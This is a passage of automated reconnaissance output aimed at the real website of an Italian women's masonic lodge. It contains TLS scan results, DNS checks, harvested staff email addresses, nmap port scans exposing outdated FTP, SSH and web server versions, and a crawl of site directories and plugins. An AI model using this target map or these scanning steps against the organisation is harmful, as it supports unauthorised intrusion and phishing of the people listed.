  639. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  640. TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  641. TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  642. TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  643. TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  644. Undefined - An unexpected error happened:
  645. TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
  646. TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
  647. TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
  648.  
  649. * TLSV1_2 Cipher Suites:
  650. Forward Secrecy OK - Supported
  651. RC4 OK - Not Supported
  652.  
  653. Preferred:
  654. TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  655. Accepted:
  656. TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  657. TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  658. TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  659. TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  660. TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  661. TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  662. TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  663. TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  664. TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  665. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  666. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  667. TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  668. TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  669. TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  670. TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  671. TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  672. TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  673. TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  674. TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  675. TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  676. TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  677. TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  678. Undefined - An unexpected error happened:
  679. TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
  680. TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
  681.  
  682. * OpenSSL Heartbleed:
  683. OK - Not vulnerable to Heartbleed
  684.  
  685. * Downgrade Attacks:
  686. TLS_FALLBACK_SCSV: OK - Supported
  687.  
  688. * ROBOT Attack:
  689. OK - Not vulnerable
  690.  
  691. * TLS 1.2 Session Resumption Support:
  692. With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
  693. With TLS Tickets: OK - Supported
  694.  
  695. * Session Renegotiation:
  696. Client-initiated Renegotiation: OK - Rejected
  697. Secure Renegotiation: OK - Supported
  698.  
  699. * OpenSSL CCS Injection:
  700. OK - Not vulnerable to OpenSSL CCS injection
  701.  
  702. * SSLV2 Cipher Suites:
  703. Server rejected all cipher suites.
  704.  
  705. * SSLV3 Cipher Suites:
  706. Server rejected all cipher suites.
  707. Undefined - An unexpected error happened:
  708. TLS_DH_anon_WITH_AES_256_CBC_SHA256 timeout - timed out
  709. TLS_DH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
  710. TLS_DH_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
  711.  
  712. * TLSV1 Cipher Suites:
  713. Forward Secrecy OK - Supported
  714. RC4 OK - Not Supported
  715.  
  716. Preferred:
  717. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  718. Accepted:
  719. TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  720. TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  721. TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  722. TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  723. TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  724. TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  725. TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  726. TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  727. TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  728. TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 301 Moved Permanently - https://www.alladv.it/
  729. Undefined - An unexpected error happened:
  730. TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
  731.  
  732.  
  733. SCAN COMPLETED IN 66.73 S
  734. -------------------------
  735. ######################################################################################################################################
  736. Domains still to check: 1
  737. Checking if the hostname granloggiafemminile.it. given is in fact a domain...
  738.  
  739. Analyzing domain: granloggiafemminile.it.
  740. Checking NameServers using system default resolver...
  741. IP: 195.7.227.1 (United Kingdom)
  742. HostName: ns2.register.it Type: NS
  743. HostName: ns2.register.it Type: PTR
  744. IP: 195.110.124.140 (Italy)
  745. HostName: ns1.register.it Type: NS
  746. HostName: ns1.register.it Type: PTR
  747.  
  748. Checking MailServers using system default resolver...
  749. IP: 195.110.124.132 (Italy)
  750. HostName: mail.register.it Type: MX
  751. HostName: mail.register.it Type: PTR
  752.  
  753. Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
  754. No zone transfer found on nameserver 195.110.124.140
  755. No zone transfer found on nameserver 195.7.227.1
  756.  
  757. Checking SPF record...
  758. No SPF record
  759.  
  760. Checking 192 most common hostnames using system default resolver...
  761. IP: 77.238.18.215 (Italy)
  762. HostName: www.granloggiafemminile.it. Type: A
  763. IP: 195.110.124.132 (Italy)
  764. HostName: mail.register.it Type: MX
  765. HostName: mail.register.it Type: PTR
  766. HostName: pop.granloggiafemminile.it. Type: A
  767.  
  768. Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
  769. Checking netblock 195.110.124.0
  770. Checking netblock 77.238.18.0
  771. Checking netblock 195.7.227.0
  772.  
  773. Searching for granloggiafemminile.it. emails in Google
  774. maat@granloggiafemminile.it&
  775. demetra@granloggiafemminile.it&
  776. aldebaran@granloggiafemminile.it&
  777. laconcordia@granloggiafemminile.it&
  778. ipathya@granloggiafemminile.it&
  779. gm@granloggiafemminile.it.
  780. posta@granloggiafemminile.it
  781. gm@granloggiafemminile.it
  782. iside@granloggiafemminile.it.
  783. portadelsole@granloggiafemminile.it&
  784. astarte@granloggiafemminile.it&
  785. europa@granloggiafemminile.it&
  786.  
  787. Checking 4 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
  788. Host 195.110.124.140 is up (reset ttl 64)
  789. Host 77.238.18.215 is up (reset ttl 64)
  790. Host 195.110.124.132 is up (reset ttl 64)
  791. Host 195.7.227.1 is up (reset ttl 64)
  792.  
  793. Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
  794. Scanning ip 195.110.124.140 (ns1.register.it (PTR)):
  795. 53/tcp open domain syn-ack ttl 50 PowerDNS Authoritative Server 4.1.13
  796. | dns-nsid:
  797. | NSID: dupre09 (64757072653039)
  798. | id.server: dupre09
  799. |_ bind.version: PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  800. Scanning ip 77.238.18.215 (www.granloggiafemminile.it.):
  801. adjust_timeouts2: packet supposedly had rtt of -90653 microseconds. Ignoring time.
  802. adjust_timeouts2: packet supposedly had rtt of -90653 microseconds. Ignoring time.
  803. adjust_timeouts2: packet supposedly had rtt of -116968 microseconds. Ignoring time.
  804. adjust_timeouts2: packet supposedly had rtt of -116968 microseconds. Ignoring time.
  805. adjust_timeouts2: packet supposedly had rtt of -70520 microseconds. Ignoring time.
  806. adjust_timeouts2: packet supposedly had rtt of -70520 microseconds. Ignoring time.
  807. 21/tcp open ftp syn-ack ttl 46 ProFTPD 1.3.4a
  808. 22/tcp open ssh syn-ack ttl 46 OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
  809. | ssh-hostkey:
  810. | 1024 bf:7d:fc:6b:bb:a4:d2:d5:3a:f6:4f:93:90:8a:cc:c7 (DSA)
  811. | 2048 97:d9:57:28:3e:87:a5:22:b6:fb:f8:e2:14:dc:d1:70 (RSA)
  812. |_ 256 1a:a7:fd:2d:ee:01:c3:eb:58:df:25:5f:fb:44:66:f1 (ECDSA)
  813. 80/tcp open http syn-ack ttl 46 nginx 1.6.2
  814. | http-methods:
  815. |_ Supported Methods: GET HEAD
  816. |_http-server-header: nginx/1.6.2
  817. |_http-title: Site doesn't have a title (text/html).
  818. 443/tcp open ssl/http syn-ack ttl 46 nginx 1.6.2
  819. | http-methods:
  820. |_ Supported Methods: HEAD POST
  821. |_http-server-header: nginx/1.6.2
  822. |_http-title: Did not follow redirect to https://www.alladv.it/
  823. | ssl-cert: Subject: commonName=www.alladv.it
  824. | Subject Alternative Name: DNS:www.alladv.it, DNS:alladv.it
  825. | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
  826. | Public Key type: rsa
  827. | Public Key bits: 2048
  828. | Signature Algorithm: sha256WithRSAEncryption
  829. | Not valid before: 2019-02-11T00:00:00
  830. | Not valid after: 2020-03-12T12:00:00
  831. | MD5: 5ab7 d878 259a 98b4 11ee 4745 d727 f5e9
  832. |_SHA-1: e697 b089 d7b7 5f1e cdc6 d07a f1ab 7d9b 4a38 4559
  833. |_ssl-date: TLS randomness does not represent time
  834. | tls-nextprotoneg:
  835. |_ http/1.1
  836. OS Info: Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  837. Scanning ip 195.110.124.132 (pop.granloggiafemminile.it.):
  838. 80/tcp open http syn-ack ttl 241 nginx 1.6.2
  839. |_http-favicon: Unknown favicon MD5: 2C0E16E117EEC1ACCCD030B8FAABE7A8
  840. | http-methods:
  841. |_ Supported Methods: GET HEAD
  842. |_http-title: Not configured webmail
  843. 110/tcp open pop3 syn-ack ttl 50 Dovecot pop3d
  844. |_pop3-capabilities: UIDL SASL(PLAIN) AUTH-RESP-CODE RESP-CODES USER TOP CAPA PIPELINING
  845. 143/tcp open imap syn-ack ttl 49 Dovecot imapd
  846. |_imap-capabilities: LITERAL+ more have OK ID ENABLE IMAP4rev1 AUTH=PLAINA0001 SASL-IR post-login Pre-login capabilities LOGIN-REFERRALS listed IDLE
  847. 443/tcp open ssl/http syn-ack ttl 241 nginx 1.6.2
  848. |_http-favicon: Unknown favicon MD5: 2C0E16E117EEC1ACCCD030B8FAABE7A8
  849. | http-methods:
  850. |_ Supported Methods: GET HEAD
  851. |_http-title: Not configured webmail
  852. | ssl-cert: Subject: commonName=webmail.register.it/organizationName=Register.it S.p.A./stateOrProvinceName=Firenze/countryName=IT
  853. | Subject Alternative Name: DNS:webmail.register.it
  854. | Issuer: commonName=Thawte EV RSA CA 2018/organizationName=DigiCert Inc/countryName=US
  855. | Public Key type: rsa
  856. | Public Key bits: 2048
  857. | Signature Algorithm: sha256WithRSAEncryption
  858. | Not valid before: 2018-10-03T00:00:00
  859. | Not valid after: 2019-10-03T12:00:00
  860. | MD5: 02c4 45b6 cd89 e781 009e 81a0 5071 747b
  861. |_SHA-1: 70f5 0853 2f51 4467 ed2b a225 5690 d36b a582 c5ca
  862. 993/tcp open ssl/imaps? syn-ack ttl 241
  863. |_ssl-date: TLS randomness does not represent time
  864. 995/tcp open ssl/pop3s? syn-ack ttl 241
  865. |_ssl-date: TLS randomness does not represent time
  866. Device type: general purpose|load balancer
  867. Scanning ip 195.7.227.1 (ns2.register.it (PTR)):
  868. 53/tcp open domain syn-ack ttl 51 PowerDNS Authoritative Server 4.1.13
  869. | dns-nsid:
  870. | NSID: dupre16 (64757072653136)
  871. | id.server: dupre16
  872. |_ bind.version: PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  873. WebCrawling domain's web servers... up to 50 max links.
  874.  
  875. + URL to crawl: http://www.granloggiafemminile.it.
  876. + Date: 2019-09-25
  877.  
  878. + Crawling URL: http://www.granloggiafemminile.it.:
  879. + Links:
  880. + Crawling http://www.granloggiafemminile.it.
  881. + Crawling http://www.granloggiafemminile.it./i-nostri-principi
  882. + Crawling http://www.granloggiafemminile.it./il-nostro-calendario-eventi
  883. + Crawling http://www.granloggiafemminile.it./category/notizie
  884. + Crawling http://www.granloggiafemminile.it./le-logge
  885. + Crawling http://www.granloggiafemminile.it./glossario
  886. + Crawling http://www.granloggiafemminile.it./contatti
  887. + Crawling http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.3.8 (404 Not Found)
  888. + Crawling http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60 (404 Not Found)
  889. + Crawling http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.3.8 (404 Not Found)
  890. + Crawling http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1 (404 Not Found)
  891. + Crawling http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.3.8 (404 Not Found)
  892. + Crawling http://www.granloggiafemminile.it./il-nostro-calendario-eventi/il-nostro-calendario-eventi (404 Not Found)
  893. + Crawling http://www.granloggiafemminile.it./category/notizie/il-nostro-calendario-eventi (404 Not Found)
  894. + Crawling http://www.granloggiafemminile.it./le-logge/il-nostro-calendario-eventi (404 Not Found)
  895. + Crawling http://www.granloggiafemminile.it./contatti/il-nostro-calendario-eventi (404 Not Found)
  896. + Searching for directories...
  897. - Found: http://www.granloggiafemminile.it./category/
  898. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/
  899. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/
  900. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/
  901. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/
  902. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/
  903. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/
  904. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/
  905. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-blockui/
  906. - Found: http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-cookie/
  907. - Found: http://www.granloggiafemminile.it./il-nostro-calendario-eventi/
  908. - Found: http://www.granloggiafemminile.it./category/notizie/
  909. - Found: http://www.granloggiafemminile.it./le-logge/
  910. - Found: http://www.granloggiafemminile.it./contatti/
  911. - Found: http://www.granloggiafemminile.it./js/
  912. - Found: http://www.granloggiafemminile.it./i-nostri-principi/
  913. - Found: http://www.granloggiafemminile.it./i-nostri-principi/js/
  914. - Found: http://www.granloggiafemminile.it./il-nostro-calendario-eventi/js/
  915. - Found: http://www.granloggiafemminile.it./category/notizie/js/
  916. - Found: http://www.granloggiafemminile.it./le-logge/js/
  917. - Found: http://www.granloggiafemminile.it./glossario/
  918. - Found: http://www.granloggiafemminile.it./glossario/js/
  919. - Found: http://www.granloggiafemminile.it./contatti/js/
  920. + Searching open folders...
  921. - http://www.granloggiafemminile.it./category/ (404 Not Found)
  922. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/ (404 Not Found)
  923. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/ (404 Not Found)
  924. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/ (404 Not Found)
  925. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/ (404 Not Found)
  926. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/ (404 Not Found)
  927. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/ (404 Not Found)
  928. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/ (404 Not Found)
  929. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-blockui/ (timed out)
  930. > Problems in searching for open folders or crawling again the folders with indexing.
  931.  
  932. + Crawl finished successfully.
  933. ----------------------------------------------------------------------
  934. Summary of http://http://www.granloggiafemminile.it.
  935. ----------------------------------------------------------------------
  936. + Links crawled:
  937. - http://www.granloggiafemminile.it.
  938. - http://www.granloggiafemminile.it./category/notizie
  939. - http://www.granloggiafemminile.it./category/notizie/il-nostro-calendario-eventi (404 Not Found)
  940. - http://www.granloggiafemminile.it./contatti
  941. - http://www.granloggiafemminile.it./contatti/il-nostro-calendario-eventi (404 Not Found)
  942. - http://www.granloggiafemminile.it./glossario
  943. - http://www.granloggiafemminile.it./i-nostri-principi
  944. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi
  945. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi/il-nostro-calendario-eventi (404 Not Found)
  946. - http://www.granloggiafemminile.it./le-logge
  947. - http://www.granloggiafemminile.it./le-logge/il-nostro-calendario-eventi (404 Not Found)
  948. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.3.8 (404 Not Found)
  949. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.3.8 (404 Not Found)
  950. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.3.8 (404 Not Found)
  951. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60 (404 Not Found)
  952. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1 (404 Not Found)
  953. Total links crawled: 16
  954.  
  955. + Links to files found:
  956. - http://www.granloggiafemminile.it./category/notizie/js/jquery.placeholder.js
  957. - http://www.granloggiafemminile.it./category/notizie/js/script_ie.js
  958. - http://www.granloggiafemminile.it./contatti/js/jquery.placeholder.js
  959. - http://www.granloggiafemminile.it./contatti/js/script_ie.js
  960. - http://www.granloggiafemminile.it./glossario/js/jquery.placeholder.js
  961. - http://www.granloggiafemminile.it./glossario/js/script_ie.js
  962. - http://www.granloggiafemminile.it./i-nostri-principi/js/jquery.placeholder.js
  963. - http://www.granloggiafemminile.it./i-nostri-principi/js/script_ie.js
  964. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi/js/jquery.placeholder.js
  965. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi/js/script_ie.js
  966. - http://www.granloggiafemminile.it./js/jquery.placeholder.js
  967. - http://www.granloggiafemminile.it./js/script_ie.js
  968. - http://www.granloggiafemminile.it./le-logge/js/jquery.placeholder.js
  969. - http://www.granloggiafemminile.it./le-logge/js/script_ie.js
  970. Total links to files: 14
  971.  
  972. + Externals links found:
  973. - http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.18/themes/smoothness/jquery-ui.css?ver=4.1.9
  974. - http://fonts.googleapis.com/css?family=Great+Vibes&
  975. - http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C700italic%2C300%2C400%2C600%2C700%2C800&
  976. - http://gmpg.org/xfn/11
  977. - http://www.google.com/recaptcha/api/challenge?k=6Lf9PwYTAAAAANxsBnpgfYtI5p2z4ePNbw24lXBV&hl=en
  978. - http://www.google.com/recaptcha/api/noscript?k=6Lf9PwYTAAAAANxsBnpgfYtI5p2z4ePNbw24lXBV
  979. - http://www.granloggiafemminile.it/
  980. - http://www.granloggiafemminile.it/?p=1072
  981. - http://www.granloggiafemminile.it/?p=1175
  982. - http://www.granloggiafemminile.it/?p=833
  983. - http://www.granloggiafemminile.it/?p=924
  984. - http://www.granloggiafemminile.it/?p=926
  985. - http://www.granloggiafemminile.it/attivita-estere/climaf
  986. - http://www.granloggiafemminile.it/attivita-estere/clipsas
  987. - http://www.granloggiafemminile.it/attivita-estere/umm
  988. - http://www.granloggiafemminile.it/author/alladv
  989. - http://www.granloggiafemminile.it/calendario-eventi/?ical=1
  990. - http://www.granloggiafemminile.it/category/notizie
  991. - http://www.granloggiafemminile.it/category/notizie-2
  992. - http://www.granloggiafemminile.it/category/notizie/feed
  993. - http://www.granloggiafemminile.it/category/notizie/in-evidenza
  994. - http://www.granloggiafemminile.it/category/notizie/page/2
  995. - http://www.granloggiafemminile.it/category/notizie/page/3
  996. - http://www.granloggiafemminile.it/comments/feed
  997. - http://www.granloggiafemminile.it/contatti
  998. - http://www.granloggiafemminile.it/evento/lurlo-silenzioso-la-violenza-di-genere
  999. - http://www.granloggiafemminile.it/feed
  1000. - http://www.granloggiafemminile.it/glossario
  1001. - http://www.granloggiafemminile.it/i-nostri-principi
  1002. - http://www.granloggiafemminile.it/il-nostro-calendario-eventi
  1003. - http://www.granloggiafemminile.it/informativa-sui-cookie
  1004. - http://www.granloggiafemminile.it/le-logge
  1005. - http://www.granloggiafemminile.it/le-logge/aldebaran-oriente-ferrara
  1006. - http://www.granloggiafemminile.it/le-logge/antigone-oriente-di-roma
  1007. - http://www.granloggiafemminile.it/le-logge/ariuan-n-30-oriente-di-roma
  1008. - http://www.granloggiafemminile.it/le-logge/astarte-n-29-oriente-di-cagliari
  1009. - http://www.granloggiafemminile.it/le-logge/beatrix-oriente-di-gemona
  1010. - http://www.granloggiafemminile.it/le-logge/demetra-oriente-di-roma
  1011. - http://www.granloggiafemminile.it/le-logge/esperia-oriente-di-arezzo
  1012. - http://www.granloggiafemminile.it/le-logge/europa-oriente-bologna
  1013. - http://www.granloggiafemminile.it/le-logge/foggia-triangolo-argos-hippion
  1014. - http://www.granloggiafemminile.it/le-logge/heliopolis-oriente-di-reggio-calabria
  1015. - http://www.granloggiafemminile.it/le-logge/ipathya-oriente-di-livorno
  1016. - http://www.granloggiafemminile.it/le-logge/la-concordia-oriente-di-firenze
  1017. - http://www.granloggiafemminile.it/le-logge/la-melagrana-oriente-di-firenze
  1018. - http://www.granloggiafemminile.it/le-logge/lubiana-ljubljana-triangolo-grande-madre-velika-mati
  1019. - http://www.granloggiafemminile.it/le-logge/maat-25-oreinte-di-torino
  1020. - http://www.granloggiafemminile.it/le-logge/mercure-80-n4-oriente-di-roma
  1021. - http://www.granloggiafemminile.it/le-logge/messina-triangolo-alnilam
  1022. - http://www.granloggiafemminile.it/le-logge/porta-de-sole-n-12-oriente-di-firenze
  1023. - http://www.granloggiafemminile.it/le-logge/r-l-albizia-n-37-oriente-di-firenze
  1024. - http://www.granloggiafemminile.it/le-logge/r-l-aurora-n-32-oriente-di-milano
  1025. - http://www.granloggiafemminile.it/le-logge/r-l-eleonora-darborea-n-36-oriente-di-oristano
  1026. - http://www.granloggiafemminile.it/le-logge/r-l-eureka-n-20-oriente-di-milano
  1027. - http://www.granloggiafemminile.it/le-logge/r-l-iside-n-35-or-ancona
  1028. - http://www.granloggiafemminile.it/le-logge/r-l-mons-gebel-n-28-oriente-di-catania
  1029. - http://www.granloggiafemminile.it/notizie/cerimonia-di-innalzamento-colonne-r-l-mons-gebel-n-39
  1030. - http://www.granloggiafemminile.it/notizie/cerimonia-di-innalzamento-delle-colonne-della-r-l-fides-n-40-or-di-cagliari
  1031. - http://www.granloggiafemminile.it/notizie/conferenza-di-vincenzo-gallucci-roma-25-maggio-2019
  1032. - http://www.granloggiafemminile.it/notizie/glmfi-chiusura-del-convento-annuale-firenze-19-10-19
  1033. - http://www.granloggiafemminile.it/notizie/in-evidenza/colloquio-climaf-identita-e-alterita-berlin-2627-1-19
  1034. - http://www.granloggiafemminile.it/notizie/in-evidenza/glmfi-chiusura-del-convento-annuale-firenze-20-ottobre-2018
  1035. - http://www.granloggiafemminile.it/notizie/in-evidenza/il-legame-di-fratellanza-dinamiche-e-criticita-roma-15-12-2018
  1036. - http://www.granloggiafemminile.it/notizie/in-evidenza/il-libro-di-paola-bombardieri-e-stefania-pavan
  1037. - http://www.granloggiafemminile.it/notizie/in-evidenza/la-loggia-femminile-anita-garibaldi-al-grande-oriente-ditalia-firenze-4-10-2019
  1038. - http://www.granloggiafemminile.it/notizie/lurlo-silenzioso-la-violenza-di-genere-ferrara-12-10-2019
  1039. - http://www.granloggiafemminile.it/storia/allocuzioni
  1040. - http://www.granloggiafemminile.it/storia/la-storia-glmfi
  1041. - http://www.granloggiafemminile.it/storia/le-gm
  1042. - http://www.granloggiafemminile.it/wp-content/plugins/creare-eu-cookie-law-banner/js/eu-cookie-law.js
  1043. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/css/style.css?ver=1.2.5
  1044. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/datetimepicker/jquery.datetimepicker.css?ver=2.2.9
  1045. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/datetimepicker/jquery.datetimepicker.js?ver=2.2.9
  1046. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/fonts/font-awesome/css/font-awesome.min.css?ver=4.1.0
  1047. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/js/script.js?ver=1.2.5
  1048. - http://www.granloggiafemminile.it/wp-content/plugins/dhvc-form/assets/validate/jquery.validate.min.js?ver=1.12.0
  1049. - http://www.granloggiafemminile.it/wp-content/plugins/gravityforms/css/browsers.min.css?ver=1.9.5.22
  1050. - http://www.granloggiafemminile.it/wp-content/plugins/gravityforms/css/formreset.min.css?ver=1.9.5.22
  1051. - http://www.granloggiafemminile.it/wp-content/plugins/gravityforms/css/formsmain.min.css?ver=1.9.5.22
  1052. - http://www.granloggiafemminile.it/wp-content/plugins/gravityforms/css/readyclass.min.css?ver=1.9.5.22
  1053. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/css/js_composer.css?ver=4.4.2
  1054. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/css/vc-ie8.css
  1055. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/components/vc_grid.js?ver=4.4.2
  1056. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/components/vc_grid_style_all.js?ver=4.4.2
  1057. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/components/vc_grid_style_lazy.js?ver=4.4.2
  1058. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/components/vc_grid_style_load_more.js?ver=4.4.2
  1059. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/components/vc_grid_style_pagination.js?ver=4.4.2
